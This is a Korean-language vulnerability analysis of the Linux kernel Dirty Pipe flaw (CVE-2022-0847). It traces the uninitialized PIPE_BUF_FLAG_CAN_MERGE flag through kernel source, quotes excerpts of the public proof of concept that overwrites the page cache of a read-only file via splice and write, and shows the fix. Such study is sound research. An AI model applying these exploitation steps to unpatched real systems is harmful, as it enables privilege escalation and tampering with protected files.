Intro#

TOOR 팀 활동을 하며 분석하게된 리눅스 커널 원데이 취약점에 관한 글입니다.

이번에 알아볼 Dirty Pipe 취약점은 2022년 3월 7일에 공개된 리눅스 파이프 처리와 관련된 커널 취약점입니다.

해당 취약점은 리눅스의 pipe 연산 과정중 파이프 버퍼에 설정된 플래그값이 파이프관련 시스템 콜에서 적절하게 초기화가 진행되지 않고 사용되어 발생하는 취약점입니다.

이로인해 공격자는 읽기 권한이 있는 파일의 페이지 캐시를 덮어쓸 수 있습니다.

본 글은 선행 연구를 진행하신 다른 연구원분들의 글들을 읽고 제 나름 분석을 진행하며 취약점을 공부하며 이해하고 정리해본 결과로 작성하게된 글입니다. 나름의 분석을 해봤지만 맞지 않는 부분이 있을 수 있으며, 만약 이를 발견하셨을 시 피드백해주시면 적극 반영하도록 하겠습니다. 취약점 및 PoC 분석에 많은 도움이된 자료는 다음과 같습니다.

Vuln#

CVE-ID : CVE-2022-0847
CWE-665: Improper Initialization

RCA#

취약점은 파이프의 특정 연산으로 인해 설정된 PIPE_BUF_FLAG_CAN_MERGE의 초기화가 제대로 진행되지 않아서 발생하게됩니다. 이게 무슨뜻일까요?

리눅스가 파이프를 생성하는 호출 흐름을 보면 다음과 같습니다.

위의 플로우를 보면 알 수 있듯, 파이프를 생성할 때 데이터의 이동을 위한 pipe_buffer 구조체를 생성합니다.

리눅스 커널 버전 5.16.10에서의 파이프 버퍼의 구조체를 확인해보면 다음과 같습니다. (본 글에서 오디팅에 사용된 코드들은 전부 리눅스 커널 버전 5.16.10의 소스 코드입니다.)

1
/**
2
 *  struct pipe_buffer - a linux kernel pipe buffer
3
 *  @page: the page containing the data for the pipe buffer
4
 *  @offset: offset of data inside the @page
5
 *  @len: length of data inside the @page
6
 *  @ops: operations associated with this buffer. See @pipe_buf_operations.
7
 *  @flags: pipe buffer flags. See above.
8
 *  @private: private data owned by the ops.
9
 **/
10
struct pipe_buffer {
11
  struct page *page;
12
  unsigned int offset, len;
13
  const struct pipe_buf_operations *ops;
14
  unsigned int flags;
15
  unsigned long private;
16
};

구조체에서도 알 수 있듯, 파이프 버퍼는 데이터 이동을 위해 페이지를 참조하고 있습니다.

이 버퍼는 pipe_inode_info에서 다음과 같이 배열(struct pipe_buffer *bufs) 형태로 관리됩니다.

1
/**
2
 *  struct pipe_inode_info - a linux kernel pipe
3
 *  @mutex: mutex protecting the whole thing
4
 *  @rd_wait: reader wait point in case of empty pipe
5
 *  @wr_wait: writer wait point in case of full pipe
6
 *  @head: The point of buffer production
7
 *  @tail: The point of buffer consumption
8
 *  @note_loss: The next read() should insert a data-lost message
9
 *  @max_usage: The maximum number of slots that may be used in the ring
10
 *  @ring_size: total number of buffers (should be a power of 2)
11
 *  @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
12
 *  @tmp_page: cached released page
13
 *  @readers: number of current readers of this pipe
14
 *  @writers: number of current writers of this pipe
15
 *  @files: number of struct file referring this pipe (protected by ->i_lock)
16
 *  @r_counter: reader counter
17
 *  @w_counter: writer counter
18
 *  @poll_usage: is this pipe used for epoll, which has crazy wakeups?
19
 *  @fasync_readers: reader side fasync
20
 *  @fasync_writers: writer side fasync
21
 *  @bufs: the circular array of pipe buffers
22
 *  @user: the user who created this pipe
23
 *  @watch_queue: If this pipe is a watch_queue, this is the stuff for that
24
 **/
25
struct pipe_inode_info {
26
  struct mutex mutex;
27
  wait_queue_head_t rd_wait, wr_wait;
28
  unsigned int head;
29
  unsigned int tail;
30
  unsigned int max_usage;
31
  unsigned int ring_size;
32
#ifdef CONFIG_WATCH_QUEUE
33
  bool note_loss;
34
#endif
35
  unsigned int nr_accounted;
36
  unsigned int readers;
37
  unsigned int writers;
38
  unsigned int files;
39
  unsigned int r_counter;
40
  unsigned int w_counter;
41
  unsigned int poll_usage;
42
  struct page *tmp_page;
43
  struct fasync_struct *fasync_readers;
44
  struct fasync_struct *fasync_writers;
45
  struct pipe_buffer *bufs;
46
  struct user_struct *user;
47
#ifdef CONFIG_WATCH_QUEUE
48
  struct watch_queue *watch_queue;
49
#endif
50
};

위의 파이프에 대한 정보는 get_pipe_inode에서 생성된 inode에 등록됩니다. 다음 get_pipe_inode 일부의 코드에서 볼 수 있듯, 파이프 연산에 대한 테이블(pipefifo_fops)이 삽입됩니다.

1
static struct inode * get_pipe_inode(void)
2
{
3
  struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
4
  struct pipe_inode_info *pipe;
5

6
  ...
7

8
  pipe = alloc_pipe_info();
9

10
  ...
11

12
  inode->i_pipe = pipe;
13
  pipe->files = 2;
14
  pipe->readers = pipe->writers = 1;
15
  inode->i_fop = &pipefifo_fops;
16

17
  ...
18
}

테이블에 명시된 연산들을 살펴보면 실제 파이프를 통해 특정 연산(read, write등)를 수행했을 때 동작하게되는 함수들을 알 수 있습니다.

1
const struct file_operations pipefifo_fops = {
2
  .open    = fifo_open,
3
  .llseek    = no_llseek,
4
  .read_iter  = pipe_read,
5
  .write_iter  = pipe_write,
6
  .poll    = pipe_poll,
7
  .unlocked_ioctl  = pipe_ioctl,
8
  .release  = pipe_release,
9
  .fasync    = pipe_fasync,
10
  .splice_write  = iter_file_splice_write,
11
};

파이프에 쓰기 작업을 할 때의 pipe_write 함수의 일부 코드를 살펴봅시다. 다음은 파이프가 초기상태로 파이프 버퍼에 페이지가 비어있는 경우 pipe_write는 다음과 같은 루틴을 통해 페이지를 할당하게되고 파이프 버퍼 슬롯에 페이지가 삽입됩니다. 해당 영역에는 유저 영역에서 넘어온 데이터가 기록됩니다.

1
for (;;) {
2
    if (!pipe->readers) {
3
      send_sig(SIGPIPE, current, 0);
4
      if (!ret)
5
        ret = -EPIPE;
6
      break;
7
    }
8

9
    head = pipe->head;
10
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
11
      unsigned int mask = pipe->ring_size - 1;
12
      struct pipe_buffer *buf = &pipe->bufs[head & mask];
13
      struct page *page = pipe->tmp_page;
14
      int copied;
15

16
      if (!page) {
17
        page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
18
        if (unlikely(!page)) {
19
          ret = ret ? : -ENOMEM;
20
          break;
21
        }
22
        pipe->tmp_page = page;
23
      }
24

25
      /* Allocate a slot in the ring in advance and attach an
26
       * empty buffer.  If we fault or otherwise fail to use
27
       * it, either the reader will consume it or it'll still
28
       * be there for the next write.
29
       */
30
      spin_lock_irq(&pipe->rd_wait.lock);
31

32
      head = pipe->head;
33
      if (pipe_full(head, pipe->tail, pipe->max_usage)) {
34
        spin_unlock_irq(&pipe->rd_wait.lock);
35
        continue;
36
      }
37

38
      pipe->head = head + 1;
39
      spin_unlock_irq(&pipe->rd_wait.lock);
40

41
      /* Insert it into the buffer array */
42
      buf = &pipe->bufs[head & mask];
43
      buf->page = page;
44
      buf->ops = &anon_pipe_buf_ops;
45
      buf->offset = 0;
46
      buf->len = 0;
47
      if (is_packetized(filp))
48
        buf->flags = PIPE_BUF_FLAG_PACKET;
49
      else
50
        buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
51
      pipe->tmp_page = NULL;
52

53
      copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
54

55
      ...

위 코드 중에서 다음 조건문에 의해서 할당된 버퍼 정보에 PIPE_BUF_FLAG_CAN_MERGE가 설정될 수 있다는 사실을 알 수 있습니다.

1
    if (is_packetized(filp))
2
      buf->flags = PIPE_BUF_FLAG_PACKET;
3
    else
4
      buf->flags = PIPE_BUF_FLAG_CAN_MERGE;

is_packetized 함수는 생성된 파이프에 대한 파일 포인터의 flags에 O_DIRECT가 설정되었는지 확인하는 함수로 기본적으로 사용자 영역에서 이 플래그를 제어(설정)할 수 있습니다.

1
static inline int is_packetized(struct file *file)
2
{
3
   return (file->f_flags & O_DIRECT) != 0;
4
}

따라서 파이프 생성, 데이터 기록시에 파이프 버퍼의 flags에 PIPE_BUF_FLAG_CAN_MERGE 플래그가 설정된 파이프 버퍼를 만들 수 있습니다.

이렇게 설정된 PIPE_BUF_FLAG_MERGE 플래그는 지금부터 알아볼 splice 시스템 콜 함수에서 적절하게 초기화되지 않아 문제가됩니다.

splice 시스템 콜은 파이프와 파이프간, 혹은 파이프와 파일간의 데이터 이동에 있어서 효율적인 처리를 위해 고안된 함수로, 데이터를 전송하는 과정에 있어서 유저 공간으로의 데이터 복사를 필요로 하지않고 커널 영역에서의 데이터 이동이 가능하게해줍니다.

즉, 파일에 있는 데이터를 파이프에 옮기거나 파이프에 있는 데이터를 파이프에 옮기는 과정에서 유저 영역으로의 복사를 생략하고, 커널 영역에서의 이동만으로 효율적인 처리를 하는 함수라고 생각하면됩니다.

splice 시스템 콜은 파이프를 대상으로한 시스템 콜로 다음과 같은 경우를 지원합니다.

pipe → pipe
file → pipe
pipe → file

이러한 splice의 호출 흐름 중 file → pipe의 흐름에 대한 그림을 그려보면 다음과 같아집니다.

NVD의 Description 내용을 보면 알 수 있듯, 취약점은 위 흐름 중 copy_page_to_iter_pipe에서 발생하는 것을 알 수 있습니다.

플로우에 나타난 filemap_read는 페이지 캐시로부터 데이터를 읽어들입니다. 그리고 이렇게 읽어들인 페이지 정보는 copy_page_to_iter를 통해서 파이프로 전달하는 과정을 거치게됩니다.

copy_page_to_iter_pipe를 확인해보면 이렇게 읽어들인 페이지가 어떻게 파이프로 이동하는지 알 수 있습니다.

1
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
2
       struct iov_iter *i)
3
{
4
  struct pipe_inode_info *pipe = i->pipe;
5
  struct pipe_buffer *buf;
6
  unsigned int p_tail = pipe->tail;
7
  unsigned int p_mask = pipe->ring_size - 1;
8
  unsigned int i_head = i->head;
9
  size_t off;
10

11
  if (unlikely(bytes > i->count))
12
    bytes = i->count;
13

14
  if (unlikely(!bytes))
15
    return 0;
16

17
  if (!sanity(i))
18
    return 0;
19

20
  off = i->iov_offset;
21
  buf = &pipe->bufs[i_head & p_mask];
22

23
  ...
24

25
  if (pipe_full(i_head, p_tail, pipe->max_usage))
26
    return 0;
27

28
  buf->ops = &page_cache_pipe_buf_ops;
29
  get_page(page);
30
  buf->page = page;
31
  buf->offset = offset;
32
  buf->len = bytes;
33

34
  pipe->head = i_head + 1;
35
  i->iov_offset = offset + bytes;
36
  i->head = i_head;
37
out:
38
  i->count -= bytes;
39
  return bytes;
40
}

위 코드를 보면 알 수 있듯, 앞서 가져온 페이지 캐시를 현재 파이프 버퍼의 헤드 부분에 삽입하는 것을 볼 수 있습니다. 이 과정에서 페이지 캐시에 대한 정보를 갖는 파이프 버퍼의 플래그 값이 초기화되지 않습니다. 이로인해 앞서 살펴본 pipe_write의 루틴 중 PIPE_BUF_FLAG_CAN_MERGE가 버퍼에 설정되어있을 경우의 처리로 인해서 페이지 캐시를 덮어쓸 수 있게됩니다.

1
static ssize_t
2
pipe_write(struct kiocb *iocb, struct iov_iter *from)
3
{
4
  ...
5

6
    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
7
        offset + chars <= PAGE_SIZE) {
8
      ret = pipe_buf_confirm(pipe, buf);
9
      if (ret)
10
        goto out;
11

12
      ret = copy_page_from_iter(buf->page, offset, chars, from);
13
      if (unlikely(ret < chars)) {
14
        ret = -EFAULT;
15
        goto out;
16
      }
17

18
      buf->len += ret;
19
      if (!iov_iter_count(from))
20
        goto out;
21
    }
22
  }
23
  ...
24
}

PIPE_BUF_FLAG_CAN_MERGE가 설정되어있을 경우 pipe_write는 삽입되는 정보를 페이지 캐시에 그대로 작성하게됩니다.

이는 읽기권한만 있는 파일에도 동일하게 적용되며, 플래그가 제대로 초기화되지 않은 시점에서 읽기 권한만 존재하는 파일의 페이지 캐시를 덮어써 원하는 데이터를 읽게 유도할 수 있습니다. 자세한 공격 방식은 PoC 파트에서 알아봅시다.

PoC#

PoC는 여기에서 확인할 수 있습니다.

먼저 공격에 사용할 파이프와 파이프 버퍼의 플래그를 설정하는 prepare_pipe 함수의 일부입니다.

1
/**
2
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
3
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
4
 */
5
static void prepare_pipe(int p[2])
6
{
7
  ...
8

9
  /* fill the pipe completely; each pipe_buffer will now have
10
     the PIPE_BUF_FLAG_CAN_MERGE flag */
11
  for (unsigned r = pipe_size; r > 0;) {
12
    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
13
    write(p[1], buffer, n);
14
    r -= n;
15
  }
16

17
  /* drain the pipe, freeing all pipe_buffer instances (but
18
     leaving the flags initialized) */
19
  for (unsigned r = pipe_size; r > 0;) {
20
    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
21
    read(p[0], buffer, n);
22
    r -= n;
23
  }
24

25
  /* the pipe is now empty, and if somebody adds a new
26
     pipe_buffer without initializing its "flags", the buffer
27
     will be mergeable */
28
}

파이프를 만들고 모두 비움으로써 모든 파이프 버퍼의 플래그를 PIPE_BUF_FLAG_CAN_MERGE로 설정합니다.

이렇게 만들어지는 공격용 파이프는 main 함수에서 다음과 같이 사용됩니다.

1
int main() {
2
  ...
3

4
  const int fd = open(path, O_RDONLY); // yes, read-only! :-)
5

6
  ...
7

8
    /* create the pipe with all flags initialized with
9
     PIPE_BUF_FLAG_CAN_MERGE */
10
  int p[2];
11
  prepare_pipe(p);
12

13
  /* splice one byte from before the specified offset into the
14
     pipe; this will add a reference to the page cache, but
15
     since copy_page_to_iter_pipe() does not initialize the
16
     "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
17
  --offset;
18
  ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
19

20
  ...
21
}

splice 시스템 콜을 통해 file → pipe 형태의 연산으로 파이프에 읽기 전용 파일에 대한 참조가 생성됩니다.

즉, 파이프 버퍼에 읽기 전용 파일에 대한 포인터가 담기게됐고, 플래그는 초기화되지 않은 상태입니다.

파이프는 읽기 전용 페이지 캐시에 데이터를 쓸 수 있게 됐습니다. 따라서 다음과 같은 공격 코드로 원하는 데이터를 원하는 오프셋 지점부터 써넣습니다.

1
/* the following write will not create a new pipe_buffer, but
2
     will instead write into the page cache, because of the
3
     PIPE_BUF_FLAG_CAN_MERGE flag */
4
  nbytes = write(p[1], data, data_size);

Patch#

patch 내용은 이곳에서 확인할 수 있습니다.

1
--- a/lib/iov_iter.c
2
+++ b/lib/iov_iter.c
3
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
4
     return 0;
5

6
   buf->ops = &page_cache_pipe_buf_ops;
7
+  buf->flags = 0;
8
   get_page(page);
9
   buf->page = page;
10
   buf->offset = offset;
11
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
12
       break;
13

14
     buf->ops = &default_pipe_buf_ops;
15
+    buf->flags = 0;
16
     buf->page = page;
17
     buf->offset = 0;
18
     buf->len = min_t(ssize_t, left, PAGE_SIZE);

파이프 버퍼의 플래그를 초기화 시키는 코드가 추가됐습니다.

Mitigation#

해당 취약점에 대한 보안 업데이트를 통해 취약점을 완화시킬 수 있습니다.